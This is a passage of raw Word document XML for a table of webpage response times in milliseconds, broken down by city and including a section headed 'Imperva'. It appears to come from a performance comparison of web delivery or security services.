          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34346D3B"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543</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A4F46AD"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467</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E573750"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500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F1B115"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555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D23553B"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459</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F89BA22"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459</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B69460"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524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3467019D"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470</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB5BC99"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5055</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="41B3A45D" w14:textId="77777777" w:rsidTr="001C3F72">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2727F9AF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sydney, Australia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43A27D66"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708</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB18F31"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372</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75CF1C2C"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384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2578A7DE"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525</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CCA812"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408</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66588BC2"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390</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DF68DC8"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393</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26AA189C"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392</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="667EE253"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381</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CBD7933"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383</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BDF5458"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4336</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="170235CE" w14:textId="77777777" w:rsidTr="001C3F72">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23B548F2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Washington DC, United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CBC387D"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631</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD005AD"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499</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="567697D6"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526</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EABCC5A"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508</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FCB69D8"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482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A85271"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269</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="496FA420"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256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AF828D4"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223</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D43389C"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550</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16DFB295"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258</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ED2C5FD"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4202</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="06DC599D" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AD6F0D5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E202C8"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254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23917F9C"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981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD94C0E"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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E477A64"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472F4F34"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7CFE67E9"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46E556AC"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673AD63B"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573975CA"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5268B6D9"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163B9553" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="46431385" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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E6681F3"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lastRenderedPageBreak/>
              <w:t>Imperva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11660" w:type="dxa"/>
            <w:gridSpan w:val="11"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D941DAB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Webpage Response (ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="460611CC" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1650AC76"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City, Country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FF4E7DC"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="616FB737"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D4A016"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="190E1D13"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7E1467"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E19D97"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
